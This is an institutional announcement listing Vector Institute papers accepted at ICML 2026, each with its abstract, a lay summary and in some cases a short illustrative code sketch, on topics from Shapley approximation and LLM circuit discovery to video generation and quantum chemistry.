Vector researchers are presenting work across a broad front at this year’s International Conference on Machine Learning (ICML), taking place July 6–11, 2026 in Seoul, South Korea. With 73 accepted papers – Vector’s strongest showing at ICML to date – and 11 spotlight papers among them, Vector Faculty Members, Vector Faculty Affiliates, Vector Distinguished Postdoctoral Fellows, and Vector staff are contributing to some of the most active areas of machine learning research today.
Vector’s research portfolio at ICML 2026 spans reinforcement learning and post-training for advanced reasoning, generative AI and video generation, multimodal and vision-language systems, autonomous agents and planning, and foundational work in optimization and machine learning theory. Alongside these technical advances, several accepted position papers reflect the community’s commitment to shaping how AI is built and governed – addressing responsible deployment of agentic systems, environmental sustainability, fairness in high-stakes decision-making, and the long-term well-being of people who use AI. Applications in scientific discovery, including genomics, quantum chemistry, and materials modelling, further demonstrate the reach of Vector’s research into real-world domains.
Below you will find 73 accepted papers from Vector Faculty Members, Vector Faculty Affiliates, Vector Distinguished Postdoctoral Fellows and Vector staff.
Adalina: Adaptive Linear Approximation for the Shapley Value and Beyond
Weida Li, Yaoliang Yu (Vector Faculty Member), Bryan Kian Hsiang Low
Abstract
The Shapley value, and its broader family of semi-values, has received much attention in various attribution problems. A fundamental and long-standing challenge is their efficient approximation, since exact computation generally requires an exponential number of utility queries in the number of players $n$. To meet the challenges of large-scale applications, we explore the limits of efficiently approximating semi-values under a $\Theta(n)$ space constraint. Building upon a vector concentration inequality, we establish a theoretical framework that enables sharper query complexities for existing unbiased randomized algorithms. Within this framework, we systematically develop a linear-space algorithm that requires $O(\frac{n}{\epsilon^{2}}\log\frac{1}{\delta})$ utility queries to ensure $P(\|\hat{\boldsymbol\phi}-\boldsymbol\phi\|\geq\epsilon)\leq \delta$ for all commonly used semi-values. In particular, our framework naturally bridges OFA, unbiased kernelSHAP, SHAP-IQ and the regression-adjusted approach, and definitively characterizes when paired sampling is beneficial. Moreover, our algorithm allows explicit minimization of the mean squared error $\mathbb{E}[\|\hat{\boldsymbol\phi}-\boldsymbol\phi\|^{2}]$ for each specific utility function. Accordingly, we introduce the first adaptive, linear-time, linear-space randomized algorithm, Adalina, that theoretically achieves improved mean squared error. All of our theoretical findings are experimentally validated. Our code is available at https://github.com/watml/adalina.
Summary
This work studies how to efficiently approximate the Shapley value and its extensions, which are popular tools for measuring the contributions of individual features, data points, or participants in cooperative systems. Computing these values exactly is usually extremely expensive because the required computation grows exponentially with the number of players. To address this challenge, we develop a new theoretical framework for efficient approximation while using only memory that scales linearly with the number of players. Our analysis further provides improved guarantees on the number of utility evaluations required to obtain sufficiently accurate estimates. Based on this framework, we design a new algorithm called Adalina, which adaptively reduces the expected approximation error for each specific problem instance. Adalina is the first randomized algorithm that is simultaneously adaptive, linear-time, and linear-space. Our framework also unifies several existing approximation methods, including OFA, unbiased kernelSHAP, SHAP-IQ, and regression-adjusted approaches, and clarifies when paired sampling techniques are helpful.
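To make the approximation problem concrete, here is a minimal sketch of the classic permutation-sampling estimator of the Shapley value. It is not Adalina and uses none of the paper's adaptive machinery; it only illustrates what a utility query is and how an estimate can be accumulated in memory linear in the number of players. The function name, the toy additive game, and all parameters are hypothetical.

```python
import random
from typing import Callable, FrozenSet, List


def shapley_permutation_estimate(
    n: int,
    utility: Callable[[FrozenSet[int]], float],
    num_permutations: int,
    seed: int = 0,
) -> List[float]:
    """Average each player's marginal contribution over random orderings."""
    rng = random.Random(seed)
    phi = [0.0] * n  # one running sum per player: linear memory
    players = list(range(n))
    for _ in range(num_permutations):
        rng.shuffle(players)
        coalition = set()
        prev = utility(frozenset(coalition))
        for i in players:
            coalition.add(i)
            cur = utility(frozenset(coalition))  # one utility query
            phi[i] += cur - prev  # marginal contribution of player i
            prev = cur
    return [total / num_permutations for total in phi]


# Toy additive game (an assumption for illustration): the value of a
# coalition is the sum of its members' weights, so the exact Shapley
# value of each player equals its own weight.
weights = [1.0, 2.0, 3.0]


def additive_utility(coalition: FrozenSet[int]) -> float:
    return sum(weights[i] for i in coalition)


estimate = shapley_permutation_estimate(3, additive_utility, num_permutations=50)
```

Each sampled permutation costs `n + 1` utility queries here, which is the quantity that query-complexity bounds such as the one in the abstract aim to control.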
All Circuits Lead to Rome: Rethinking Functional Anisotropy in Circuit and Sheaf Discovery for LLMs
Xi Chen, Mingyu Jin, Jingcheng (Frank) Niu, Yutong Yin, Jinman Zhao, Bangwei Guo, Dimitris Metaxas, Zhaoran Wang, Yutao Yue, Gerald Penn (Vector Faculty Affiliate)
Abstract
In this paper, we present empirical and theoretical evidence against a central but largely implicit assumption in circuit and sheaf discovery (CSD), which we term the Functional Anisotropy Hypothesis: the idea that functions in large language models (LLMs) are localised to a unique or near-unique internal mechanism. We show that a single LLM task can instead be supported by multiple, structurally distinct circuits or sheaves that are simultaneously faithful, sparse, and complete. To systematically uncover such competing mechanisms, we introduce Overlap-Aware Sheaf Repulsion, a method that augments the CSD objective with an explicit penalty on structural overlap across multiple discovery runs, enabling the discovery of circuits or sheaves with strong task performance but minimal shared structure across a plethora of common CSD benchmarks. We find that this phenomenon becomes increasingly pronounced as the number of discovered sheaves grows and persists robustly across major CSD methods. We further identify an ultra-sparse three-edge sheaf and show that none of its edges is individually indispensable, undermining even weakened notions of canonical or essential components. To explain these findings, we propose a Distributive Dense Circuit Hypothesis and provide a theoretical analysis demonstrating that non-unique, low-overlap circuit explanations arise naturally from high-dimensional superposition under mild assumptions. Together, our results suggest that mechanistic explanations in LLMs are inherently non-canonical and call for a rethinking of how CSD results should be interpreted and evaluated.
Summary
Large language models are often interpreted as using a specific internal “circuit” or “sheaf” to perform a task. Our paper challenges this assumption. We show that the same task can often be carried out by many very different internal mechanisms inside the same model, even when those mechanisms barely overlap structurally. To study this systematically, we introduce a method called Overlap-Aware Sheaf Repulsion (OASR) that augments DiscoGP, which explicitly searches for alternative low-overlap circuits or sheaves that still solve the task well. Across multiple benchmarks, by exploiting instabilities and arbitrary choices in existing circuit discovery methods, we consistently uncover many competing explanations rather than a single canonical one. We also identify an extremely small three-edge mechanism for a standard language-model task, but show that even its components are not uniquely essential. Altogether, our results suggest that computation in large language models is more distributed and non-unique than current mechanistic interpretability assumptions imply. We further provide a theoretical framework explaining why multiple low-overlap explanations can naturally arise in large language models.
TLDR: LLM tasks are not implemented by one unique true “circuit” or “sheaf”: many distinct, low-overlap mechanisms can simultaneously support the same behavior.
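The idea of penalizing structural overlap across discovery runs can be sketched as follows. This is an illustrative assumption, not the paper's OASR objective: circuits are represented as binary edge masks, overlap is measured with the Jaccard index, and the names `jaccard_overlap`, `repulsion_objective`, and `strength` are hypothetical.

```python
import numpy as np


def jaccard_overlap(mask_a: np.ndarray, mask_b: np.ndarray) -> float:
    """Fraction of edges shared by two binary edge masks (Jaccard index)."""
    a = mask_a.astype(bool)
    b = mask_b.astype(bool)
    union = np.logical_or(a, b).sum()
    if union == 0:
        return 0.0
    return float(np.logical_and(a, b).sum() / union)


def repulsion_objective(
    task_loss: float,
    mask: np.ndarray,
    previous_masks: list,
    strength: float = 1.0,
) -> float:
    """Task loss plus a penalty for reusing edges found in earlier runs."""
    penalty = sum(jaccard_overlap(mask, prev) for prev in previous_masks)
    return task_loss + strength * penalty


# Hypothetical masks over four edges.
found_circuit = np.array([1, 1, 0, 0])
same_circuit = np.array([1, 1, 0, 0])
disjoint_circuit = np.array([0, 0, 1, 1])

loss_same = repulsion_objective(0.5, same_circuit, [found_circuit])
loss_disjoint = repulsion_objective(0.5, disjoint_circuit, [found_circuit])
```

With equal task loss, the candidate that shares no edges with the earlier circuit scores lower, so a search minimizing this objective is pushed toward structurally distinct explanations.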
The Appeal and Reality of Recycling LoRAs with Adaptive Merging
Haokun Liu, Gyung Hyun Je, Marco Ciccone (Vector Distinguished Postdoctoral Fellow), Zhenlin Xu, Prasanth YSS, Colin Raffel (Vector Faculty Member)
Abstract
The widespread availability of fine-tuned LoRA modules for open pre-trained models has led to an interest in methods that can adaptively merge LoRAs to improve performance. These methods typically include some way of selecting LoRAs from a pool and tuning merging coefficients based on a task-specific dataset. While adaptive merging methods have demonstrated improvements in some settings, no past work has attempted to recycle LoRAs found “in the wild” on model repositories like the Hugging Face Hub. To address this gap, we consider recycling from a pool of nearly 1,000 user-contributed LoRAs trained from the Llama 3.1 8B-Instruct language model. Our empirical study includes a range of adaptive and non-adaptive merging methods in addition to a new method designed via a wide search over the methodological design space. We demonstrate that adaptive merging methods can improve performance over the base model but provide limited benefit over training a new LoRA on the same data used to set merging coefficients. We additionally find not only that the specific choice of LoRAs to merge has little importance, but that using LoRAs with randomly initialized parameter values yields similar performance. To better understand why past work has proven successful, we confirm that positive transfer is indeed possible when there are highly relevant LoRAs in the pool. We release the model checkpoints and code online at https://github.com/r-three/realistic-adaptive-merging.
Summary
Modern large-language models are generally good at many tasks but not all; they can be further specialized for new task domains using small add-ons (like skill patches). Individual contributors have developed and shared thousands of these patches, freely available for public use. Merging these publicly available skill patches into a single model to enhance specialization in a particular task has therefore emerged as an exciting prospect. We test the viability of this idea by recycling nearly 1,000 skill patches that individual contributors have uploaded to public repositories.
Unfortunately, our work shows that merging these patches is not as effective as training a single fresh skill patch on the same task’s data, which is a simple and straightforward alternative. We find that merging these patches is successful only when the pool consists of highly relevant patches, which is unrealistic in a practical recycling setting. Our analysis suggests that prior work’s successes with skill patch merging may not stem from combining expertise across patches, but rather from a side effect that incidentally stabilizes model behavior. Overall, our findings indicate that effortlessly recycling skill patches is more complicated than it appears.
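For readers unfamiliar with the mechanics, merging can be sketched as a weighted sum of low-rank updates added to a base weight matrix. A LoRA stores its update as a product `B @ A` of two small matrices; the sketch below assumes every LoRA targets the same layer, omits the usual LoRA scaling factor, and takes the merging coefficients as given rather than tuning them on task data. The function name and shapes are hypothetical, and this is not the paper's method.

```python
import numpy as np


def merge_loras(base_weight: np.ndarray, loras: list, coefficients: list) -> np.ndarray:
    """Return base_weight + sum_i c_i * (B_i @ A_i) for low-rank pairs (B_i, A_i)."""
    merged = base_weight.copy()
    for (B, A), c in zip(loras, coefficients):
        merged += c * (B @ A)  # each LoRA contributes a rank-r update
    return merged


rng = np.random.default_rng(0)
d_out, d_in, rank = 6, 5, 2
base = rng.normal(size=(d_out, d_in))
# Two hypothetical LoRAs for the same layer.
pool = [
    (rng.normal(size=(d_out, rank)), rng.normal(size=(rank, d_in)))
    for _ in range(2)
]

merged = merge_loras(base, pool, coefficients=[0.7, 0.3])
```

An adaptive merging method would choose which entries of `pool` to use and fit `coefficients` on a task-specific dataset; the comparison in the paper is against simply training one new `(B, A)` pair on that same data.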
Attention with Routed-Memory for Learnable Sparse Control
Qiuhao Zeng, Jerry Huang, Peng Lu, Ruiyi Fang, Gezheng Xu, Zihao Jing, Yufei Cui, Charles X. Ling, Gang Niu, Boyu Wang (Vector Faculty Affiliate)
Abstract
Despite advances in long-context inference, large language models (LLMs) remain fundamentally limited by the key-value (KV) caching mechanisms that are necessary for stable computation. Management techniques, such as selective token eviction and pruning, have vastly mitigated the issues that have arisen, but often discard potentially useful information to manage the growing memory requirements of the cache. In this paper, we build upon these approaches to propose Attention with Routed Memory (ARM), a novel KV caching structure that introduces a fully differentiable, fixed-size memory system organized as a hierarchical routing structure that learns to select memory slots via Gumbel-Softmax and performs sigmoid-gated updates that softly combine new and stored information, avoiding hard eviction and thereby reducing information loss. By combining this with a policy to dynamically select varying amounts of memory at inference, ARM adapts its accesses for simple contexts and expands retrieval for inputs that require deeper reasoning, enabling more scalable and effective retrieval on both short and long contexts. Experimental results on standard commonsense and long-context reasoning benchmarks demonstrate that ARM achieves superior performance and efficiency compared to fixed KV-caching approaches, while remaining efficient and scalable in terms of both memory and generation latency.
Summary
Large language model inference is fundamentally limited by a cache of previous computations that needs to be maintained throughout generation. This becomes an issue during long-context inference, so earlier techniques reduce the burden by directly removing cache elements as generation proceeds.
In this work, we introduce _**ARM**_, a new caching structure shaped as a hierarchy with a fixed number of memory slots in which information can be routed and stored. _**ARM**_ gradually mixes in information in a soft manner, avoiding issues that come with directly pruning or evicting individual pieces of information. We further augment _**ARM**_ to dynamically select differing amounts of information from the memories depending on the input context, enabling faster, more effective retrieval on varying types of problems, which is further confirmed by empirical validations.
TLDR: We introduce a new key-value cache structured as a hierarchical router of memories that dynamically selects memory slots to use for different contexts.
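The two ingredients named in the abstract, Gumbel-Softmax slot selection and a sigmoid-gated soft update, can be sketched in a few lines of NumPy. This is a simplified, flat (non-hierarchical) illustration under assumed shapes, not the ARM architecture; `slot_logits` and `gate_logit` stand in for quantities a trained model would produce.

```python
import numpy as np


def gumbel_softmax(logits: np.ndarray, temperature: float, rng: np.random.Generator) -> np.ndarray:
    """Relaxed one-hot sample over slots: softmax((logits + Gumbel noise) / T)."""
    u = rng.uniform(low=1e-9, high=1.0, size=logits.shape)
    gumbel_noise = -np.log(-np.log(u))
    z = (logits + gumbel_noise) / temperature
    z = z - z.max()  # subtract the max for numerical stability
    w = np.exp(z)
    return w / w.sum()


def gated_update(
    memory: np.ndarray,       # (num_slots, dim), fixed size
    new_item: np.ndarray,     # (dim,)
    slot_logits: np.ndarray,  # (num_slots,)
    gate_logit: float,
    temperature: float = 0.5,
    rng: np.random.Generator = None,
) -> np.ndarray:
    """Softly blend new_item into the selected slots instead of evicting anything."""
    if rng is None:
        rng = np.random.default_rng(0)
    select = gumbel_softmax(slot_logits, temperature, rng)
    gate = 1.0 / (1.0 + np.exp(-gate_logit))  # sigmoid gate in (0, 1)
    blend = (select * gate)[:, None]          # per-slot mixing weight
    return (1.0 - blend) * memory + blend * new_item[None, :]


rng = np.random.default_rng(1)
memory = rng.normal(size=(4, 3))
item = rng.normal(size=3)
updated = gated_update(memory, item, slot_logits=np.zeros(4), gate_logit=0.0, rng=rng)
```

Because every slot becomes a convex combination of its old content and the new item, the memory never grows and nothing is hard-deleted, which is the contrast with eviction-based cache management drawn above.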
Bad Seeing or Bad Thinking? Rewarding Perception for Multimodal Reasoning
Spotlight paper
Haozhe Wang, Qixin Xu, Changpeng Wang, Taofeng Xue, Chong Peng, Wenhu Chen (Vector Faculty Member), Fangzhen Lin
Abstract
Achieving robust perception-reasoning synergy is a central goal for advanced Vision-Language Models (VLMs). Recent advancements have pursued this goal via architectural designs or agentic workflows. However, these approaches are often limited by static textual reasoning or complicated by the significant compute and engineering burden of external agentic complexity. Worse, this heavy investment does not yield proportional gains, often witnessing a “seesaw effect” on perception and reasoning. This motivates a fundamental rethinking of the true bottleneck. In this paper, we argue that the root cause of this trade-off is an ambiguity in modality credit assignment: when a VLM fails, is it due to flawed perception (“bad seeing”) or flawed logic (“bad thinking”)? To resolve this, we introduce a reinforcement learning framework that improves perception-reasoning synergy by reliably rewarding the perception fidelity. We explicitly decompose the generation process into interleaved perception and reasoning steps. This decoupling enables targeted supervision on perception. Crucially, we introduce Perception Verification (PV), leveraging a “blindfolded reasoning” proxy to reward perceptual fidelity independently of reasoning outcomes. Furthermore, to scale training across free-form VL tasks, we propose Structured Verbal Verification, which replaces high-variance LLM judging with structured algorithmic execution. These techniques are integrated into a Modality-Aware Credit Assignment (MoCA) mechanism, which routes rewards to the specific source of error — either bad seeing or bad thinking — enabling a single VLM to achieve simultaneous performance gains across a wide task spectrum.
Summary
When a vision-language AI model gets a question wrong about an image, we don’t know if it saw the wrong thing or thought about it incorrectly — much like a doctor misreading an X-ray versus misinterpreting a correctly-read one. This “bad seeing vs. bad thinking” ambiguity means current training methods cannot target the actual source of error, causing a frustrating tradeoff: improving visual skills degrades reasoning, and vice versa.
We solve this by splitting the model’s response into explicit perception steps (what it sees) and reasoning steps (what it concludes). To evaluate perception independently, we introduce a “blindfolded reasoner” test: we feed the model’s visual descriptions — without the image — to a text-only AI. If it can answer correctly from those descriptions alone, the perception was accurate; if not, the model saw poorly. We combine this with a new structured verification method for evaluating final answers, creating a credit assignment system that precisely blames either “bad seeing” or “bad thinking.”
Our approach, MoCA, is the first to break the perception-reasoning tradeoff. A single 7B-parameter model simultaneously improves on perception-heavy, reasoning-heavy, and document understanding tasks — even surpassing GPT-4o on several benchmarks — without the computational cost of multi-turn agentic systems.
Black-Box Detection of LLM-Generated Text Using Generalized Jensen Shannon Divergence
Shuangyi Chen, Ashish Khisti (Vector Faculty Affiliate)
Abstract
We study black-box detection of machine-generated text under practical constraints: the scoring model (proxy LM) may mismatch the unknown source model, and per-input contrastive generation is costly. We propose SurpMark, a reference-based detector that summarizes a passage by the dynamics of its token surprisals. SurpMark discretizes surprisals into interpretable states, estimates a state-transition matrix for the test text, and scores it via a generalized Jensen–Shannon (GJS) gap between the test transitions and two fixed references (human vs. machine) built once from existing corpora. Theoretically, we derive design guidance for how the discretization bins should scale with data and provide a principled justification for our test statistic. Empirically, across multiple datasets, source models, and scenarios, SurpMark consistently matches or surpasses baselines, demonstrating strong robustness across domains and generators; our experiments on hyperparameter sensitivity exhibit trends that our theoretical results help to explain.
Summary
As AI-generated text becomes increasingly common, it is important to develop reliable ways to distinguish it from human-written text. This paper studies machine-generated text detection by looking at how predictable or surprising each token is under a language model. We propose SurpMark, a method that compares the patterns of these token-level surprise signals between human-written and machine-generated text. Across multiple datasets, generators, and robustness settings, SurpMark performs better than existing detection methods.
TLDR: We propose a reference-based detector using surprisal-state Markov transitions and GJS score to flag AI text—fast, accurate, no regeneration.
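The pipeline described in the abstract (discretize surprisals into states, estimate transitions, compare against two references) can be sketched as below. Several choices are assumptions made for illustration and may differ from SurpMark: the bin edges, the additive smoothing, the use of the joint distribution over state pairs, and the weighted form of the generalized Jensen–Shannon divergence, $\alpha\,\mathrm{KL}(P\|M) + (1-\alpha)\,\mathrm{KL}(Q\|M)$ with $M = \alpha P + (1-\alpha) Q$.

```python
import numpy as np


def transition_distribution(surprisals, bin_edges, smoothing: float = 1.0) -> np.ndarray:
    """Discretize surprisals into states and return smoothed state-pair frequencies."""
    states = np.digitize(surprisals, bin_edges)  # state ids 0..len(bin_edges)
    k = len(bin_edges) + 1
    counts = np.full((k, k), smoothing)  # smoothing keeps every entry positive
    for s, t in zip(states[:-1], states[1:]):
        counts[s, t] += 1.0
    return counts / counts.sum()


def gjs(p: np.ndarray, q: np.ndarray, alpha: float = 0.5) -> float:
    """Weighted Jensen-Shannon divergence between two strictly positive distributions."""
    m = alpha * p + (1.0 - alpha) * q
    kl_pm = np.sum(p * np.log(p / m))
    kl_qm = np.sum(q * np.log(q / m))
    return float(alpha * kl_pm + (1.0 - alpha) * kl_qm)


def gjs_gap(test: np.ndarray, human_ref: np.ndarray, machine_ref: np.ndarray, alpha: float = 0.5) -> float:
    """Positive when the test text sits closer to the machine reference."""
    return gjs(test, human_ref, alpha) - gjs(test, machine_ref, alpha)


# Toy surprisal sequences (fabricated purely to exercise the code).
edges = [1.0, 3.0]
human_ref = transition_distribution([5.0, 0.5] * 10, edges)
machine_ref = transition_distribution([0.5] * 20, edges)
test_text = transition_distribution([0.6] * 20, edges)

gap = gjs_gap(test_text, human_ref, machine_ref)
```

The two references are built once, so scoring a new passage needs only one pass of the proxy language model to obtain its surprisals, with no per-input regeneration.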
Context Forcing: Consistent Autoregressive Video Generation with Long Context
Shuo Chen, Cong Wei, Sun Sun, Tiancheng Shen, Ping Nie, Kai Zou, Ge Zhang, Ming-Hsuan Yang, Wenhu Chen (Vector Faculty Member)
Abstract
Recent approaches to real-time long video generation typically employ streaming tuning strategies, attempting to train a long-context student using a short-context (memoryless) teacher. In these frameworks, the student performs long rollouts but receives supervision from a teacher limited to short 5-second windows. This structural discrepancy creates a critical **student-teacher mismatch**: the teacher’s inability to access long-term history prevents it from guiding the student on global temporal dependencies, effectively capping the student’s context length. To resolve this, we propose **Context Forcing**, a novel framework that trains a long-context student via a long-context teacher. By ensuring the teacher is aware of the full generation history, we eliminate the supervision mismatch, enabling the robust training of models capable of long-term consistency. To make this computationally feasible for extreme durations (e.g., 2 minutes), we introduce a context management system that transforms the linearly growing context into a **Slow-Fast Memory** architecture, significantly reducing visual redundancy. Extensive results demonstrate that our method enables effective context lengths exceeding 20 seconds, 6–10x longer than state-of-the-art methods like LongLive and Infinite-RoPE. By leveraging this extended context, Context Forcing preserves superior consistency across long durations, surpassing state-of-the-art baselines on various long video evaluation metrics.
Summary
AI can now generate video in real time, but these systems tend to forget what they created moments earlier, so over a long clip, faces, objects, and backgrounds slowly drift and stop matching up. The cause lies in how the AI is trained: one model (the “student”) learns to produce long videos by imitating a second model (the “teacher”), yet the teacher can only watch a few seconds at a time and remembers nothing before that. A teacher with no memory simply cannot teach the student to stay consistent over the long run.
We fix this by giving the teacher a memory. Our method, Context Forcing, lets the teacher see the entire video generated so far, so it can properly guide the student to stay consistent over time. To keep this practical for videos up to two minutes long, we add a memory system that keeps recent moments in sharp detail while compressing older ones and discarding redundant information.
The result is video that stays coherent over much longer stretches, roughly six to ten times longer than the best existing methods. Characters and scenes hold together from start to finish.
TLDR: Train a long-context student via a long-context teacher.
Counterfactual Residual Data Augmentation for Regression
Hossein Mohebbi, Oliver Schulte, Ke Li, Pascal Poupart (Vector Faculty Member)
Abstract
Data-driven modeling in real-world regression tasks often suffers from limited training samples, high collection costs, and noisy observations. Inspired by the impact of data augmentation in vision and language, we propose a novel Counterfactual Residual Data Augmentation (CRDA) technique for tabular regression. Our key insight is that once a regressor has modeled the systematic component of the data, the remaining noise can be viewed as an invariant residual that remains stable under small perturbations of carefully selected features. We exploit this residual invariance to generate new, yet realistic, training samples, effectively expanding the dataset without requiring additional real data. Our method is model-agnostic and readily applicable to various types of regressors. In experiments across datasets from a variety of benchmark repositories, on average, CRDA reduces an MLP Regressor’s MSE by 22.9% and an XGBoost Regressor’s MSE by 6.4%. When compared to existing state-of-the-art data generators and augmentation techniques, CRDA consistently outperforms in MSE reduction. By adding principled counterfactual variations to the training data, our method offers a simple and efficient remedy for noise-prone, small-sample regression settings.
Summary
Many everyday predictions — a house’s price, a patient’s recovery time, a factory’s output — come from models trained on data in tables. In many real settings, collecting enough data is slow, costly, or impossible, and models trained on too few examples predict poorly. Researchers know how to stretch small datasets of images or text with realistic tweaks like flips or rephrasings, but no equally simple trick existed for tables of numbers.
We developed CRDA, a method that creates believable new training examples. After a model captures the general pattern, each real example still differs slightly from what the model predicted, forming an unexplained gap or error specific to that example. CRDA changes a few of the example’s features, recalculates the model’s predicted outcome, and then re-applies that same gap, producing a new and realistic example. Built-in checks keep only the synthetic examples that actually help, and otherwise leave the model unchanged.
Across many datasets, CRDA cut prediction errors substantially, and more reliably than existing methods, especially when data was scarce. It offers a simple, safe way to get more from limited data in fields like medicine, finance, and manufacturing, where data is expensive to collect.
TLDR: A novel data augmentation methodology that improves regression model performance by generating informed synthetic training examples through residual-guided feature perturbation.
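The core step in the summary (perturb some features, re-predict, re-apply the example's own residual) can be sketched as follows. This is a minimal illustration under stated assumptions, not the CRDA implementation: it uses an ordinary least-squares regressor, perturbs one arbitrarily chosen feature with Gaussian noise, and omits both the careful feature selection and the built-in checks that filter synthetic examples. All names are hypothetical.

```python
import numpy as np


def fit_linear(X: np.ndarray, y: np.ndarray):
    """Fit least squares with an intercept and return a predict function."""
    Xb = np.hstack([X, np.ones((len(X), 1))])
    coef, *_ = np.linalg.lstsq(Xb, y, rcond=None)
    return lambda Z: np.hstack([Z, np.ones((len(Z), 1))]) @ coef


def residual_augment(X, y, predict, feature: int, scale: float, rng):
    """Create synthetic rows: perturb one feature, re-predict, add back each row's residual."""
    residual = y - predict(X)  # the part of y the model did not explain
    X_new = X.copy()
    X_new[:, feature] += rng.normal(0.0, scale, size=len(X))
    y_new = predict(X_new) + residual  # residual assumed invariant to the perturbation
    return X_new, y_new


rng = np.random.default_rng(0)
X = rng.normal(size=(20, 3))
y = X @ np.array([1.0, -2.0, 0.5]) + rng.normal(0.0, 0.1, size=20)

predict = fit_linear(X, y)
X_aug, y_aug = residual_augment(X, y, predict, feature=0, scale=0.05, rng=rng)

# Augmented training set: original rows plus their synthetic counterparts.
X_train = np.vstack([X, X_aug])
y_train = np.concatenate([y, y_aug])
```

The sketch relies on the residual-invariance assumption stated in the abstract: a small change to the chosen feature shifts the systematic part of the target but leaves the example-specific noise unchanged.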
Coupled Cluster con MoLe: Molecular Orbital Learning for Neural Wavefunctions
Luca Anthony Thiede, Abdulrahman Aldossary, Andreas Burger, Jorge Campos-Gonzalez-Angulo, Alex Zook, Melisa Alkan, Kohei Nakaji, Jérôme F. Gonthier, Taylor Patti, Mohammad Vakili, Alán Aspuru-Guzik (Vector Faculty Member)
Abstract
Density functional theory (DFT) is the most widely used method for calculating molecular properties; however, its accuracy is often insufficient for quantitative predictions. Coupled cluster (CC) theory is the most successful method for achieving accuracy beyond DFT and predicting properties that closely align with experiment. It is known as the “gold standard” of quantum chemistry. Unfortunately, the high computational cost of CC limits its widespread applicability. In this work, we present the Molecular Orbital Learning Model (MoLe), an equivariant machine learning model that directly predicts CC’s core mathematical objects, the excitation amplitudes, from the mean-field Hartree-Fock molecular orbitals as inputs. We test various aspects of our model and demonstrate its very high data efficiency and remarkable out-of-distribution generalization to larger molecules and off-equilibrium geometries, despite being trained only on small equilibrium geometries. Finally, we also examine its ability to reduce the number of cycles required to converge CC calculations. MoLe can set the foundations for high-accuracy wavefunction-based ML architectures to accelerate molecular design and complement force-field approaches.
Summary
The best quantum chemistry methods can predict molecular behavior with high accuracy, but they are often too expensive to use routinely. Cheaper methods are faster, but they can miss details that matter for designing medicines, materials, and chemical processes.
- We use molecular orbitals: a cheap description of where electrons are likely to be in a molecule.
- MoLe learns from these orbitals to predict the key quantities used by coupled cluster theory, one of the most reliable but costly methods in quantum chemistry.
- Because molecular orbitals already contain useful chemical information, MoLe can make accurate predictions even for larger molecules and shapes it did not see during training; this is the kind of generalizability needed for practical molecular design.
In short: molecular orbitals are cheap, useful, and already available, and learning from them can make accurate molecular prediction faster and more practical!
TLDR: Prediction of Coupled Cluster amplitudes for data efficient learning of molecular properties
Cross-View Lewis Weight Fusion Empowering Exemplar Replay for Federated Class-Incremental Learning
Zhuang Qi, Yingpeng Tang, Lei Meng, Xiaoxiao Li (Vector Faculty Member), Han Yu, Xiangxu Meng
Abstract
Federated Class-Incremental Learning (FCIL) aims to continually expand a model’s recognition capacity in a distributed environment, enabling it to learn new classes while retaining knowledge of previously seen ones. Exemplar replay has emerged as a promising strategy owing to its simplicity and effectiveness. Existing methods either select exemplars based on local dynamics or construct global feature spaces to identify representative samples. However, they face inherent challenges in striking a balance between effectiveness and privacy. To address this issue, this paper proposes a Cross-view Lewis weIght Fusion method for exemplar replay in FCIL, termed CLIF, which fuses multi-view importance scores to guide representative sample selection under federated settings. Specifically, CLIF consists of two main modules: 1) the cross-view Lewis weight fusion module computes and integrates Lewis weights from multiple feature perspectives to achieve consistent importance estimation, ensuring that the selected samples better reflect the global data distribution and thus enhancing the representativeness of the replay subset. Building on this, 2) the frequency-based weighted training module adjusts the loss contribution of each sample according to its selection frequency across views, which emphasizes the contribution of critical samples. Moreover, we provide a theoretical analysis to guarantee the soundness and effectiveness of CLIF. Extensive experiments on three datasets demonstrate that our method consistently improves baselines by 1%–6%, supporting the above claims.
Summary
Machine learning systems often need to keep learning new things over time. For example, an image recognition model may first learn to identify several types of objects and later need to recognize new ones. However, when the model learns new categories, it may forget what it learned before. This problem becomes harder when data are stored across many users or organizations and cannot be collected in one place due to privacy concerns. In this work, we study how to help such models remember old knowledge while learning new classes. Our idea is to let each participant keep a small but useful set of examples from the past. Instead of choosing these examples from only one viewpoint, our method looks at the data from multiple perspectives and selects examples that are more representative of the overall data. It also gives more attention during training to examples that are repeatedly identified as important. Experiments on three datasets show that our method helps models retain knowledge better and improves performance over existing approaches. This can support more reliable learning systems in privacy-sensitive settings where data must remain distributed.
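As a rough illustration of scoring examples from several viewpoints, the sketch below computes statistical leverage scores, which coincide with Lewis weights in the $\ell_2$ case, for two feature views of the same samples and fuses them by simple averaging before picking exemplars. The averaging rule, the normalization, and the choice of views are assumptions for illustration only; the paper's fusion module and its federated protocol are not reproduced here.

```python
import numpy as np


def leverage_scores(features: np.ndarray) -> np.ndarray:
    """Row leverage scores of a full-column-rank matrix via reduced QR."""
    q, _ = np.linalg.qr(features)  # q has orthonormal columns
    return np.sum(q ** 2, axis=1)  # squared row norms of q


def fuse_and_select(views: list, k: int):
    """Average per-view normalized scores and return the top-k sample indices."""
    normalized = [leverage_scores(v) / v.shape[1] for v in views]  # each sums to 1
    fused = np.mean(normalized, axis=0)
    selected = np.argsort(fused)[::-1][:k]
    return fused, selected


rng = np.random.default_rng(0)
num_samples = 30
# Two hypothetical feature views of the same 30 samples.
view_a = rng.normal(size=(num_samples, 4))
view_b = rng.normal(size=(num_samples, 6))

fused_scores, exemplar_ids = fuse_and_select([view_a, view_b], k=5)
```

Samples that score highly in several views are kept as replay exemplars; counting how often a sample is selected across views would give the kind of frequency signal that the weighted training module described in the abstract uses.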
Curated Synthetic Data Doesn’t Have to Collapse: A Theoretical Study of Generative Retraining with Pluralistic Preferences
Ali Falahati, Mohammad Mohammadi Amiri, Kate Larson (Vector Faculty Affiliate), Lukasz Golab
Abstract
Recursive retraining of generative models poses a critical representation challenge: when synthetic outputs are curated based on a fixed reward signal, the model tends to collapse onto a narrow set of outputs that over-optimize that objective, causing diversity to vanish and failing to represent the full range of preferences. Prior work has suggested that such collapse is unavoidable without adding real data into the mix. In this paper, we revisit that conclusion from an alignment perspective and show that collapse can be mitigated through curation based on multiple reward functions. We formalize the dynamics of recursive training under heterogeneous preferences and prove that, under certain conditions, the model converges to a stable distribution that allocates probability mass across competing high-reward regions. The limiting distribution preserves diversity and provably satisfies a weighted Nash bargaining solution, offering a formal interpretation of value aggregation in synthetic retraining loops.
Summary
